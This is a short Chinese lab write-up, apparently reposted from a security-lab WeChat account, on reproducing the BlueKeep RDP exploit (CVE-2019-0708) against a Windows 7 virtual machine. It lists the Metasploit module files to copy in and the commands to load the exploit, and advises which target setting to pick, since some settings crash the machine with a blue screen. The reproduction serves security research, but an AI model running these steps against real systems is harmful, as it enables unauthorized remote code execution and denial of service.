在vm中开启一台win7 x64 sp1
去https://github.com/NAXG/cve_2019_0708_bluekeep_rce 找到需要去msf添加和修改的内容
操作步骤如下
1.cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/
2.rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
3.rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
4.cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
打开msf,将模块重载
reload_all
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
1.设置目标ip
2.set taget 2
ps:
都说该设置成3,但是用一次3蓝屏一次,试了一次2居然就打到了,实践出真知。。。虽然不知道为啥。。。当然,2也蓝屏过。。。
原文始发于微信公众号(CTS纵横安全实验室):cve-2019-0708 win7复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论